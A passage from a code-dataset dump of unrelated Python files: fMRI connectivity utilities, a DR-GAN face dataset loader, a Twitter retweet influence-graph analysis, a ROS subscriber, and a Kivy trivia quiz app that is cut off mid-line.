\",\n unsafe_allow_html=True)\n","repo_name":"as1mple/ml_course_onseo","sub_path":"src/st_1.py","file_name":"st_1.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25292997971","text":"from fg_config import *\n\nfor sub in all_sub_args:\n subj = bids_meta(sub)\n for run in [1,2,3]:\n df = pd.read_csv(f'{subj.subj_dir}/ses-2/func/{subj.fsub}_ses-2_task-memory_run-0{run}_events.tsv',sep='\\t')\n df.trial_type = df.trial_type + '_' + df.encode_phase\n df.to_csv(f'{subj.preproc_dir}/func/{subj.fsub}_ses-2_task-memory_run-0{run}_space-MNI152NLin2009cAsym_desc-preproc_denoised_bold_events.tsv',sep='\\t',index=False)\n\nfrom fg_config import *\nfrom scipy.io import loadmat\n\nrois = ['vmPFC','dACC','amyg_cem','amyg_bla','hc_head','hc_body','hc_tail','animal','tool']\nconds = ['CS+_acquisition', 'CS+_baseline', 'CS+_extinction', 'CS+_foil', 'CS-_acquisition', 'CS-_baseline', 'CS-_extinction', 'CS-_foil']\ndf = pd.DataFrame({'conn':0.0},index=pd.MultiIndex.from_product([conds,all_sub_args,rois,rois],names=['condition','subject','seed','target']))\n\nfor c, cond in enumerate(conds):\n stats = loadmat(f'conn_project01/results/firstlevel/gPPI_03/resultsROI_Condition00{c+1}.mat')\n for s, sub in enumerate(all_sub_args):\n for si, seed in enumerate(rois):\n for ti, target in enumerate(rois):\n df.loc[(cond,sub,seed,target),'conn'] = stats['Z'][si,ti,s]\n\ndf = df.dropna(subset=['conn'])\n\ndf['csp_cat'] = ''\ndf = df.reset_index()\ndf['group'] = df.subject.apply(lgroup)\ndf['phase'] = df.condition.apply(lambda x: x[4:])\ndf['condition'] = df.condition.apply(lambda x: x[:3])\ndf = df.set_index(['group','phase','condition','seed','target','subject']).sort_index()\n\ndf = df.reset_index().set_index('subject')\nfor sub in all_sub_args:\n subj = bids_meta(sub)\n csp = subj.mem_df[subj.mem_df.trial_type == 'CS+']['stimulus'].values[0].split('/')[0][:-1]\n df.loc[sub,'csp_cat'] = csp\n# csm = subj.mem_df[subj.mem_df.trial_type == 'CS-']['stimulus'].values[0].split('/')[0][:-1]\n\n# cats[sub] = {csp:'csp',\n# csm:'csm'}\n# for roi in rois:\n# if roi not in ['animal','tool']:\n# cats[sub][roi] = roi\n\n# df['seed'] = df[['subject','seed']].apply(lambda x: cats[x[0]][x[1]],axis=1)\n# df['target'] = df[['subject','target']].apply(lambda x: cats[x[0]][x[1]],axis=1)\n\ndf.to_csv('conn_stats_lmm.csv')\n\n\npfc = df.reset_index().set_index(['target','group','phase','condition','seed','subject']).sort_index()\npfc = pfc.loc['vmPFC'] - pfc.loc['dACC']\npfc = pfc.dropna(subset=['conn'])\npfc.to_csv('conn_pfc_diff_lmm.csv')\n\n\naHPC = df.reset_index()\naHPC = aHPC[aHPC.seed == 'hc_head'][aHPC.target.isin(['vmPFC','dACC'])]","repo_name":"dunsmoorlab/gPPI","sub_path":"conn_utils.py","file_name":"conn_utils.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10815958700","text":"import os\nimport re\nfrom operator import itemgetter\nimport numpy as np\nimport torch.utils.data as data\nimport torchvision.transforms as transforms\n\nfrom data_processing import *\n\nclass FDDataset(data.Dataset):\n \"\"\"The class of dataset.\n\n >>> root = '/home/jaren/data/'\n >>> train_FD = FDDataset(root=root, train=True)\n >>> test_FD = FDDataset(root=root, train=False)\n >>> len(train_FD)\n 3566\n >>> len(test_FD)\n 2027\n >>> train_FD = FDDataset(root=root, train=True, single=False)\n >>> len(train_FD)\n 500\n \"\"\"\n def __init__(self, root, transform=None, train=True,\n loader=default_loader, single=True):\n\n if train:\n path = os.path.join(root, 'train')\n else:\n path = os.path.join(root, 'test')\n\n imgs = make_dataset(path)\n\n if not single:\n imgs.sort(key=itemgetter('id'))\n imgs = split_with_same_id(imgs)\n\n if len(imgs) == 0:\n raise(RuntimeError(\"Found 0 images in: \" + path + \"\\n\"\n \"Supported image extensions are: \" +\n \",\".join(IMG_EXTENSIONS)))\n\n self.root = root\n self.imgs = imgs\n self.transform = transform\n self.train = train\n self.loader = loader\n self.single = single\n\n def dict2dict(self, sample):\n \"\"\"\n input:(dict){'path':path, 'id': id, 'pose': pose, 'name': fname}\n output: (dict){'image': img, 'identity': identity, 'pose': pose, 'name': name}\n \"\"\"\n identity = sample['id']\n pose = sample['pose']\n img = self.loader(sample['path'])\n name = '{0}_{1}'.format(sample['id'], sample['name'])\n\n if self.transform:\n img = self.transform(img)\n\n return {'image': img,\n 'identity': identity,\n 'pose': pose,\n 'name': name}\n\n def __getitem__(self, idx):\n item = self.imgs[idx]\n if self.single:\n assert isinstance(item, dict)\n return self.dict2dict(item)\n else:\n assert isinstance(item, list)\n return [self.dict2dict(i) for i in item]\n\n def __len__(self):\n return len(self.imgs)\n\nif __name__ == '__main__':\n root = '/home/jaren/data/'\n transform = transforms.Compose([\n transforms.Scale((100, 100)), #Switch to the transforms.Resize on the service\n transforms.CenterCrop(96),\n transforms.ToTensor(),\n transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))\n ])\n train_FD = FDDataset(root=root, train=True, transform=transform)\n test_FD = FDDataset(root=root, train=False, transform=transform)\n s = train_FD[78]\n show_sample(s)\n\n train_FD = FDDataset(root=root, train=True, transform=transform, single=False)\n samples = train_FD[100]\n for sample in samples:\n show_sample(sample)\n","repo_name":"zhangjunh/DR-GAN-by-pytorch","sub_path":"data/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"53"} +{"seq_id":"36117883457","text":"from itertools import islice\nimport pandas as pd\nimport csv\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\n#-----------(xls-csv) conversion-----------#\n\n#------ Load the XLS file into a pandas dataframe-------#\ndf = pd.read_excel('retweets.xlsx')\n\n# Save the dataframe to a CSV file\ndf.to_csv('retweets_columnForm.csv', index=False)\n\n#--------interchange of colums and rows-----------------#\n\n# Load the CSV file into a pandas dataframe\ndf = pd.read_csv('retweets_columnForm.csv')\n\n# Transpose the dataframe (i.e., swap rows and columns)\ndf = df.transpose()\n\n# Save the transposed dataframe to a new CSV file\ndf.to_csv('retweets_rowForm.csv', header=False)\n\n\n#------------counting number of headers-----------#\nheadings=[]\nwith open('retweets_rowForm.csv', 'r') as file:\n\n # Create a reader object\n reader = csv.reader(file)\n\n # Count the number of header rows\n num_headers = 0\n for row in reader:\n if any(row):\n headings.append(row)\n num_headers += 1\n else:\n break\n#-------------------------------#\n# Print the number of headers\n# print(headings)\n\n\n# Print the column data\ncolumn_data=[]\nrow_data=[]\n\n#----storing each row of data--------#\nwith open('retweets_columnForm.csv', 'r') as file:\n reader= csv.reader(file)\n data = list(reader)\n\n row_data=data[0]\n\n\n # for name in data:\n # print(name)\n file.close()\n # row_data=[]\n\n\nG = nx.DiGraph()\npos = nx.spring_layout(G) # positions for all nodes\n\n# ---------Add nodes to the graph for each header------\nnode_labels = []\nfor name in row_data:\n if G.has_node(name):\n continue\n else:\n G.add_node(name,name=name)\n # node_labels.append(name)\n\n# nx.draw_networkx_nodes(G, pos, node_labels,node_color=\"red\")\n# Print the nodes in the graph\n\n#--------------------------#\n# print(G.nodes())\n# print(node_labels)\n\n#------iterating over the number of original users---#\nj=0\nfor name in row_data:\n #---getting the name of the user---#\n originalUser_name= name\n\n #getting the retweet data of the particular user#\n with open('retweets_rowForm.csv', 'r') as file:\n reader = csv.reader(file)\n column_datas = list(reader)\n # print(column_datas[j])\n\n #--iterating through each retweet of a specific user---#\n for retweet_name in column_datas[j]:\n # print(retweet_name)\n if retweet_name == originalUser_name:\n continue\n #if the name is null then we come out of the loop\n elif not retweet_name:\n break\n else:\n #-----checking if the graph has the particular node\n if G.has_node(retweet_name):\n #if the graph has the node then we add an edge between them\n G.add_edge(originalUser_name, retweet_name)\n else:\n #if the present graph doesnot has the node then we create the node\n G.add_node(retweet_name, name=retweet_name, color=\"red\")\n #adding edge between the nodes\n G.add_edge(originalUser_name, retweet_name)\n\n j+=1\n\n# label = G.nodes[node]['name']\npos = nx.spring_layout(G)\nnx.draw_networkx_nodes(G, pos)\nnx.draw_networkx_edges(G, pos)\nnx.draw_networkx_labels(G, pos, font_size=5)\nplt.tight_layout()\nplt.show()\n# print(nx.is_connected(G))\n\n\n#-------Getting all the nodes in the graph--#\nnode_list=[]\nfor node in G.nodes():\n node_list.append(node)\n\n\n#--------centrality-----------#\n\ndegree_centrality = nx.degree_centrality(G)\nin_degree=nx.in_degree_centrality(G)\nout_degree = nx.out_degree_centrality(G)\nbetween_centrality=nx.betweenness_centrality(G)\ncloseness_centrality = nx.closeness_centrality(G)\nkatz=nx.katz_centrality(G)\neigen_centrality = nx.eigenvector_centrality_numpy(G)\npage_rank = nx.pagerank(G)\n\n\n#-------calculating average of centralities-------#\naverage={}\nfor key, deg, betw, katzv in zip(degree_centrality, degree_centrality.values(), between_centrality.values(), katz.values()):\n avg = (deg+betw+katzv)/3\n average[key]=avg\n\n\n##-----------calculating spread of the graph----------#\n\n# Calculate the spread of the graph\nspread = {}\nfor node in G.nodes():\n spread[node] = nx.single_source_shortest_path_length(G, node)\n# print(spread)\n\n# Aggregate the results\ntotal_spread = {}\nfor node in G.nodes():\n for target, distance in spread[node].items():\n if target not in total_spread:\n total_spread[target] = distance\n else:\n total_spread[target] += distance\n\n# print(total_spread)\n# Calculate the average spread\nnum_pairs = len(total_spread)\ntotal_distance = sum(total_spread.values())\naverage_spread = total_distance / num_pairs\n# print(average_spread)\n\n\n# Compute ratio of out-degree centrality to average shortest path length\naverage_spread_outdeg={}\nfor node in G.nodes():\n if out_degree[node] == 0:\n average_spread_outdeg[node]=0\n else:\n average_spread_outdeg[node] = total_spread[node] / out_degree[node]\n\n#\n# ##-------sorting centralities to find influential people-------#\n#\n# # Sort the degree centrality data temporarily in descending order\n# sorted_deg_cent = sorted(degree_centrality.items(), key=lambda x: x[1], reverse=True)\n# sorted_btw_cent = sorted(between_centrality.items(), key=lambda x: x[1], reverse=True)\n# sorted_cls_cent = sorted(closeness_centrality.items(), key=lambda x: x[1], reverse=True)\n# sorted_eig_cent = sorted(eigen_centrality.items(), key=lambda x: x[1], reverse=True)\n\n\n#----creating a file to store the centrality data----#\ndata = [(k, degree_centrality[k], in_degree[k],out_degree[k],between_centrality[k], katz[k], eigen_centrality[k], average[k], total_spread[k]) for k in degree_centrality]\nwith open('data.csv', 'w', newline='') as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow(['Nodes','Degree_centrality', 'In_Degree', 'Out_Degree','Betweenness','KaztCentrality','Eigen_Centrality', 'Average_Centrality', 'Spread'])\n writer.writerows(data)\n\n# plt.show()\n\n##-------sorting centralities to find influential people-------#\n\n# Sort the degree centrality data temporarily in descending order\nsorted_deg_cent = sorted(degree_centrality.items(), key=lambda x: x[1], reverse=True)\nsorted_btw_cent = sorted(between_centrality.items(), key=lambda x: x[1], reverse=True)\nsorted_cls_cent = sorted(closeness_centrality.items(), key=lambda x: x[1], reverse=True)\nsorted_eig_cent = sorted(eigen_centrality.items(), key=lambda x: x[1], reverse=True)\nsorted_page_rank = sorted(page_rank.items(), key=lambda x: x[1], reverse=True)\nsorted_avg_cent = sorted(average.items(), key=lambda x: x[1], reverse=True)\nsorted_spread = sorted(average_spread_outdeg.items(), key=lambda x: x[1], reverse=True)\nsorted_katz = sorted(katz.items(), key=lambda x: x[1], reverse=True)\nsorted_out_degree = sorted(out_degree.items(), key=lambda x: x[1], reverse=True)\n\n\n#------top 5 influencers in various category-----#\n\ndeg_influencers={}\nout_deg_influencers={}\nbetw_influencers={}\nclose_influencers={}\nkatz_influencers={}\npage_rank_influencers={}\naverage_influencers={}\naverage_spread_influencers={}\n\ndeg_influencers.update(dict(islice(sorted_deg_cent, 5)))\nout_deg_influencers.update(dict(islice(sorted_out_degree, 5)))\nbetw_influencers.update(dict(islice(sorted_btw_cent, 5)))\nclose_influencers.update(dict(islice(sorted_cls_cent, 5)))\nkatz_influencers.update(dict(islice(sorted_katz, 5)))\npage_rank_influencers.update(dict(islice(sorted_page_rank, 5)))\naverage_influencers.update(dict(islice(sorted_avg_cent, 5)))\naverage_spread_influencers.update(dict(islice(sorted_spread, 5)))\n\n\n# print(deg_influencers)\n# print(betw_inflencers)\n# print(close_inflencers)\n# print(eigen_inflencers)\n\n\n##--------creating figures----------#\n\nfont = {'family': 'serif',\n 'color': 'darkred',\n 'weight': 'normal',\n 'size': 3,\n }\n\n# plot the network graph\nplt.subplot(3, 3, 1)\n# pos = nx.spring_layout(G)\nnx.draw_networkx_nodes(G, pos)\nnx.draw_networkx_edges(G, pos)\nnx.draw_networkx_labels(G, pos, font_size=0.2)\n\n# plot the first bar graph\nplt.subplot(3, 3, 2)\nplt.bar(deg_influencers.keys(), deg_influencers.values())\nplt.title('Degree Centrality')\n# plt.xlabel(\"People\")\nplt.xticks(fontsize=6)\nplt.xticks(rotation=45)\n# plt.xticks(list(range(len(deg_influencers.values()))), [label.replace(' ', '\\n') for label in deg_influencers.values()])\n\n\n# plot the second bar graph\nplt.subplot(3, 3, 3)\nplt.bar(betw_influencers.keys(), betw_influencers.values())\nplt.title('Betweenness Centrality')\nplt.xticks(fontsize=6)\nplt.xticks(rotation=45)\n\n# plot the third bar graph\nplt.subplot(3, 3, 4)\nplt.bar(close_influencers.keys(), close_influencers.values())\nplt.title('Closeness Centrality')\nplt.xticks(fontsize=6)\nplt.xticks(rotation=45)\n\n# plot the fourth bar graph\nplt.subplot(3, 3, 5)\nplt.bar(page_rank_influencers.keys(), page_rank_influencers.values())\nplt.title('PageRank Centrality')\nplt.xticks(fontsize=6)\nplt.xticks(rotation=45)\n\n# plot the fifth bar graph\nplt.subplot(3, 3, 6)\nplt.bar(average_influencers.keys(), average_influencers.values())\nplt.title('All rounder on avg centrality')\nplt.xticks(fontsize=6)\nplt.xticks(rotation=45)\n\n# plot the sixth bar graph\nplt.subplot(3, 3, 7)\nplt.bar(katz_influencers.keys(), katz_influencers.values())\nplt.title('Katz Centrality')\nplt.xticks(fontsize=6)\nplt.xticks(rotation=45)\n\n# plot the seventh bar graph\nplt.subplot(3, 3, 8)\nplt.bar(out_deg_influencers.keys(), out_deg_influencers.values())\nplt.title('Out degree')\nplt.xticks(fontsize=6)\nplt.xticks(rotation=45)\n\n# plot the eighth bar graph\nplt.subplot(3, 3, 9)\nplt.bar(average_spread_influencers.keys(), average_spread_influencers.values())\nplt.title('Average spread')\nplt.xticks(fontsize=6)\nplt.xticks(rotation=45)\n\n# adjust the layout and display the plot\nplt.tight_layout()\n\n\n# Display the figure\nplt.show()","repo_name":"Ishita-Jana/Influence-Graph-Twitter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23334287958","text":"#!/usr/bin/env python3\n\nimport rospy\nfrom std_msgs.msg import String\n\n\ndef Subscriber():\n\tsub = rospy.Subscriber('/simple_publisher',String,print_result)\n\trospy.spin()\n\t\ndef print_result(data):\n\trospy.loginfo(data)\n\nif __name__ == '__main__':\n\trospy.init_node('simple_subscriber_node')\n\tSubscriber()\n","repo_name":"hashrobotics-hr/ros_for_beginners","sub_path":"simple_catkin_ws/src/simple_pub_sub/src/simple_subscriber.py","file_name":"simple_subscriber.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30664702010","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom kivy.core.window import Window\nfrom kivy.app import App\nfrom kivy.lang import Builder\nfrom kivy.graphics import Color\nfrom time import sleep\nfrom kivy.logger import Logger\nfrom kivy.clock import Clock, mainthread\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.widget import Widget\nfrom kivy.uix.image import Image\nfrom kivy.uix.button import Button\nfrom kivy.uix.label import Label\nfrom kivy.uix.scrollview import ScrollView\nfrom kivy.uix.progressbar import ProgressBar\nfrom kivy.animation import Animation\nfrom kivy.uix.screenmanager import ScreenManager, Screen, NoTransition\nfrom kivy.properties import NumericProperty, ListProperty, StringProperty, BooleanProperty, ObjectProperty, DictProperty\n\n\nfrom random import shuffle, choice, randint\nfrom functools import partial\n\nfrom helpers import get_categories, get_verdict\nfrom trivia import Trivia\nfrom soundmachine import SoundMachine\nfrom screens import TitleScreen, Intro, Options, Instructions, Credits, Game, Score\nfrom simple_widgets import AlphaWidget, RoundedBox, PlayOrOptions, PressOK, PressColor\nfrom scrollmenu import ScrollMenu, FreeScrollView, ScrollAwareLayout, OptionButton, OptionIndicator\nfrom constants import CEC_CMD_MAP, INSTRUCTION_TEXT\n\nimport json\nimport sys\n\n\n# Pass cli arguments\n\nDISABLE_CEC = True if '--disable-cec' in sys.argv else False\nUSE_SAMPLE_DATA = True if '--use-sample-data' in sys.argv else False\nSET_SIZE = True if '--set-size' in sys.argv else False\n\n# Backend settings\n\nBACKENDS = {\n \"opentdb\": {\n \"url\": \"https://opentdb.com/api.php\",\n \"categories\": get_categories()\n\n },\n \"feduquizdb\": {\n \"url\": \"https://dillendapp.eu/feduquizdb/api/trivia\",\n \"categories\": [[\"All\", -1], [\"General knowledge\", 1],[\"Luxemburgensia\", 2]]\n }\n}\n\n\nclass GameButtons(Widget):\n\n game_root = ObjectProperty()\n\n def anim_all(self, direction, highlight=None, callback=None):\n\n # Check if we're animating in or out\n if direction == \"in\":\n anim_func = self.anim_in\n else:\n anim_func = self.anim_out\n\n # Set start timer to 0\n time_start = 0\n\n # Check what buttons need to be animated which way (to highlight answer)\n # Only really intended to be used for the fade OUT animation!\n col_list = ['red', 'green', 'yellow', 'blue'] if len(App.get_running_app().curr_btn_labels) > 2 else ['red', 'green']\n col_needed = [col for col in col_list if col is not highlight] if highlight else col_list\n \n # Check if a button is to be highlighted (ie\n if highlight:\n Animation(opacity=0, scale=1.5, duration=0.6).start(self.ids['btn_' + highlight])\n\n for index, color in enumerate(col_needed):\n\n # \"Normal\" animation\n if callback is None or index < (len(col_needed)-1):\n Clock.schedule_once(partial(anim_func, btn=self.ids['btn_' + color], callback=None), time_start)\n else:\n # We want to attach any potential callback to the last button animation\n Clock.schedule_once(partial(anim_func, btn=self.ids['btn_' + color], callback=callback), time_start)\n time_start += 0.1\n\n if direction == \"in\":\n for color in col_list:\n self.ids['btn_' + color].stop_effect_anims()\n Clock.schedule_once(self.ids['btn_' + color].effect_anim, 0.7)\n\n\n def test_func(self, *args, **kwargs):\n print('The flexible function has *args of', str(args),\n \"and **kwargs of\", str(kwargs))\n\n def anim_in(self, dt, btn, callback=None):\n anim = Animation(pos_hint={'center_x': btn.primary_position[0], 'center_y': btn.primary_position[1]}, scale=1,\n t='out_elastic', duration=1)\n if callback:\n anim.bind(on_complete=lambda anim, widget: callback())\n anim.start(btn)\n\n def anim_out(self, dt, btn, callback=None):\n anim = Animation(pos_hint={'center_x': btn.secondary_position_2[0], 'center_y': btn.secondary_position_2[1]}, scale=btn.secondary_scale_2,\n t='in_circ', duration=0.5)\n if callback:\n anim.bind(on_complete=lambda anim, widget: callback())\n anim.start(btn)\n\n def reset_pos(self):\n for color in ['red', 'green', 'yellow', 'blue']:\n btn = self.ids['btn_'+color]\n btn.opacity = 1\n btn.pos_hint = {'center_x': btn.secondary_position_1[0], 'center_y': btn.secondary_position_1[1]}\n btn.scale = btn.secondary_scale_2\n\nclass TriviaButton(Button):\n\n scale = NumericProperty()\n x_transform = NumericProperty()\n x_transform_end = NumericProperty()\n base_color = StringProperty('')\n curr_normal = ListProperty('')\n curr_down = ListProperty('')\n secondary_position_1 = ListProperty([])\n secondary_position_2 = ListProperty([])\n secondary_scale_1 = NumericProperty()\n secondary_scale_2 = NumericProperty()\n primary_position = ListProperty([])\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.anim = None\n self.anim_scheduler = None\n\n def stop_effect_anims(self):\n \"\"\"\n Stops the special effect animation of the button. This involves cancelling any\n ongoing animation and / or unscheduling scheduled animations that have been set\n by the reschedule method.\n \"\"\"\n Animation.cancel_all(self)\n if self.anim_scheduler:\n self.anim_scheduler.cancel()\n self.reset_pos()\n\n def effect_anim(self, anim=None, widget=None):\n \"\"\"\n Starts the special effect animation of the TriviaButton.\n Note that if the size changes during gameplay, for instance because the player\n alters the window size, the animation will be slightly off. Yet, this is not so important\n as the animation is stopped and restarted after every question (and hence the animation\n gets restarted using the correct self.width). So, the use of an on_width trigger is not\n really necessary.\n \"\"\"\n self.anim = Animation(x_transform=self.width+20, duration=1)\n self.anim.bind(on_complete=self.reschedule)\n self.anim.start(self)\n\n def reschedule(self, anim=None, widget=None):\n \"\"\"\n After the special animation has run once, this callback is called to reschedule\n it at a random time, so that there is a slight offset for the effect among the \n TriviaButtons.\n A reference for the clock object is kept so that Animation can be cancelled, as\n Animation.cancel_all will only catch current animations, but not the scheduled ones.\n \"\"\"\n self.reset_pos()\n self.anim_scheduler = Clock.schedule_once(self.reanim, randint(20, 40)/10)\n\n def reanim(self, dt=None):\n \"\"\"Convenience function to swallow the dt argumemt of Clock callbacks.\"\"\"\n self.anim.start(self)\n\n def reset_pos(self):\n \"\"\"Resets the special effect animation to its initial settings.\"\"\"\n self.x_transform = -20\n\n\nclass AnswerFeedbackLabel(Label):\n\n angle = NumericProperty()\n scale = NumericProperty()\n primary_angle = NumericProperty()\n primary_scale = NumericProperty()\n secondary_angle = NumericProperty()\n secondary_scale = NumericProperty()\n sentiment = StringProperty()\n\n def animate(self):\n anim_opacity = Animation(opacity=1, duration=0.5) + Animation(opacity=0, duration=0.5)\n anim_scale = Animation(scale=self.secondary_scale, angle=self.secondary_angle, duration=1)\n anim_full = anim_opacity & anim_scale\n anim_full.bind(on_complete=self.reset_pos)\n anim_full.start(self)\n\n def reset_pos(self, anim=None, widget=None):\n self.scale = self.primary_scale\n self.angle = self.primary_angle\n\nclass QuestionLabel(Label):\n\n secondary_position_1 = ListProperty()\n secondary_position_2 = ListProperty()\n primary_position = ListProperty()\n parent_width = NumericProperty()\n mask_width = NumericProperty(0)\n bg_pos = ListProperty([0,0])\n bg_size = ListProperty([0,0])\n\n def anim_mask_open(self):\n \"\"\"Widens the stencil mask so that the text becomes visible.\"\"\"\n anim = Animation(mask_width=self.bg_size[0], t='out_quad', duration=1)\n anim.start(self)\n\n def reset_pos(self, anim=None, widget=None):\n self.mask_width = 0\n\nclass Round(BoxLayout):\n pass\n\n\nclass Difficulty(BoxLayout):\n \n indicator_layout_pos = ListProperty()\n indicator_layout = ObjectProperty(rebind=True)\n\nclass Difficulty_Indicator(Widget):\n\n scale = NumericProperty()\n indicator_size = ListProperty()\n indicator_color = ListProperty()\n widget_difficulty = StringProperty()\n current_difficulty = StringProperty()\n visible = BooleanProperty()\n fore_opacity = NumericProperty()\n\nclass GameInfo(BoxLayout):\n\n secondary_position = ListProperty()\n primary_position = ListProperty()\n \nclass ScrollLabel(ScrollView):\n\n label_text = StringProperty()\n font_size = NumericProperty()\n font_name = StringProperty()\n \n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.next_label_text = None\n self.scroll_anim = None\n self.scroll_anim_scheduler = None\n\n def on_label_text(self, widget, label_text):\n \"\"\"\n The label to be displayed has changed, this means we want to animate out the currently\n scrolling label and fade back in the label with the new text.\n We first save the new label text in a variable and start the fade out animation.\n \"\"\"\n #self.next_label_text = label_text\n self.fade_out_animation()\n\n def fade_out_animation(self):\n \"\"\"\n Starts the fade out animation, but only if opacity is not already 0 (might happen if\n this is the first time the label receives a text for example).\n \"\"\"\n if self.opacity == 0:\n self.fade_in_animation()\n else:\n anim_out = Animation(opacity=0, duration=0.2)\n anim_out.bind(on_complete=self.fade_in_prep)\n anim_out.start(self)\n\n def fade_in_prep(self, anim=None, widget=None):\n \"\"\"\n This function gets called at the end of the fade out animation and prepares the\n fade in animation, for example by actually setting the label's text to the desired value\n and resetting positions etc.\n At the end, we schedule the fade in for the next frame. We do it this way so the label's\n properties are updated correctly (as we need its width).\n \"\"\"\n self.ids.scrollable_label.text = self.label_text\n Animation.cancel_all(self)\n self.reset_pos()\n Clock.schedule_once(self.fade_in_animation)\n\n def fade_in_animation(self, dt=None):\n \"\"\"\n Starts the fade in animation.\n \"\"\"\n self.scroll_anim = Animation(scroll_x=1, duration=(self.ids.scrollable_label.width / 300))\n self.scroll_anim.bind(on_complete=self.scroll_reschedule)\n self.scroll_anim.start(self)\n Animation(opacity=1, duration=0.2).start(self)\n \n def scroll_reschedule(self, anim=None, widget=None):\n \"\"\"\n Gets called at the end of each scroll animation and basically resets and reschedules it for the next frame.\n \"\"\"\n self.reset_pos()\n self.scroll_anim_scheduler = Clock.schedule_once(self.scroll_reanim)\n\n def scroll_reanim(self, dt=None):\n \"\"\"\n Convenience function to restart the scroll animation.\n \"\"\"\n self.scroll_anim.start(self)\n\n def reset_pos(self, *args):\n \"\"\"\n Resets some values to initial state.\n \"\"\"\n self.scroll_x = 0\n\n\nclass Category(BoxLayout):\n\n cat = ObjectProperty(rebind=True)\n scroll_size = ListProperty()\n spacer_width = NumericProperty()\n\nclass Author(BoxLayout):\n \n author_lbl = ObjectProperty(rebind=True)\n\nclass Feduquiz(App):\n title = 'Feduquiz'\n\n bg_col = ListProperty([0, 0, 0])\n\n trivia = Trivia(USE_SAMPLE_DATA)\n\n curr_question = StringProperty()\n curr_author = StringProperty()\n curr_type = StringProperty()\n curr_difficulty = StringProperty()\n curr_category = StringProperty()\n curr_correct = StringProperty()\n curr_wrong = ListProperty([])\n curr_btn_labels = ListProperty([])\n curr_score = NumericProperty(0)\n curr_round = NumericProperty(0)\n curr_total_rounds = NumericProperty(0)\n curr_verdict = StringProperty()\n\n opt_api = StringProperty('opentdb')\n opt_difficulty = StringProperty('')\n opt_category = NumericProperty(0)\n opt_amount = NumericProperty(10)\n opt_instant_fb = BooleanProperty(True)\n opt_type = StringProperty('')\n\n categories = ListProperty([['All', 0]])\n backends = ListProperty([[\"Open Trivia DB\", \"opentdb\"],[\"Feduquiz DB\", \"feduquizdb\"]])\n \n instruction_text = StringProperty(INSTRUCTION_TEXT)\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.categories = get_categories()\n self.bind(opt_api=self.update_categories)\n self.fps_event = Clock.schedule_interval(self.print_fps, 1/2.0)\n self.sm = None\n self.bg_anim = (Animation(bg_col=[1,0,0], duration=2) +\n Animation(bg_col=[1,1,0], duration=2) +\n Animation(bg_col=[0, 1, 1], duration=2) +\n Animation(bg_col=[0, 0, 1], duration=2) +\n Animation(bg_col=[1, 0, 1], duration=2))\n self.bg_anim.repeat = True\n\n self.snd_machine = SoundMachine()\n #self.bg_anim.start(self) # Will be started by first screen (Intro)\n\n self.callbacks = []\n\n # Register EXIT and SCREENSHOT handler\n self.add_callback(CEC_CMD_MAP[\"EXIT\"], \"ALL\", lambda: App.get_running_app().stop())\n\n # Set window size if instructed\n if SET_SIZE:\n Window.size = (1920, 1080)\n Window.left = 0\n Window.top = 1\n\n # Get keyboard\n #self._keyboard = Window.request_keyboard(self._keyboard_closed, self)\n Window.bind(on_key_down=self._on_keyboard_down)\n\n # initialise libCEC\n if not DISABLE_CEC:\n from cec_control import pyCecClient\n self.lib = pyCecClient()\n self.lib.SetCommandCallback(lambda cmd: self.command_callback(cmd, 'cec'))\n\n # initialise libCEC and enter the main loop\n self.lib.InitLibCec()\n\n def build(self):\n self.sm = ScreenManager(transition=NoTransition())\n self.sm.add_widget(Intro(name='intro'))\n self.sm.add_widget(Game(name='game'))\n self.sm.add_widget(Score(name='score'))\n self.sm.add_widget(Options(name='options'))\n self.sm.add_widget(Instructions(name='instructions'))\n self.sm.add_widget(Credits(name='credits'))\n return self.sm\n\n def update_categories(self, property, api):\n self.categories = BACKENDS[api][\"categories\"]\n\n def load_game(self, anim=None, widget=None):\n self.trivia.new_game(BACKENDS[self.opt_api][\"url\"], self.opt_difficulty, self.opt_category, self.opt_amount, self.opt_type)\n Clock.schedule_once(self.check_switch_screen)\n\n def check_switch_screen(self, dt=None):\n if not self.trivia.running:\n Clock.schedule_once(self.check_switch_screen)\n return\n self.sm.current = 'game'\n self.snd_machine.mode_game()\n\n def goto_screen(self, dt=None, s_name=None):\n if s_name:\n self.sm.current = s_name\n self.snd_machine.mode_menu()\n\n @mainthread\n def command_callback(self, cmd, origin):\n \"\"\"Callback function for the CEC module\"\"\"\n print(\"{} command received: {}\".format(origin, cmd))\n current = self.sm.current\n match = False\n for callback in self.callbacks:\n if cmd in callback[0] and (callback[1] == \"ALL\" or current == callback[1]):\n callback[2]()\n match = True\n print(\"Callback executed\")\n return match\n\n\n def add_callback(self, cmd, screen, callback):\n \"\"\"Adds a callback within the app.\"\"\"\n print(\"Adding callback \" + str(callback) + \" for screen \" + screen + \" for command \" + str(cmd))\n self.callbacks.append([cmd, screen, callback])\n\n\n def _on_keyboard_down(self, window, keycode, scancode, text, modifiers, **kwargs):\n print('The key {} {} {} has been pressed'.format(keycode, 'with text '+text if text else '', 'and modifiers '+str(modifiers) if len(modifiers)>0 else ''))\n\n # Call callback\n return self.command_callback(keycode, 'keyboard')\n\n # Return True to accept the key. Otherwise, it will be used by\n # the system.\n #return True\n \n def print_fps(self, *args):\n fps = Clock.get_fps()\n print(\"{} Fps \".format(int(fps)), 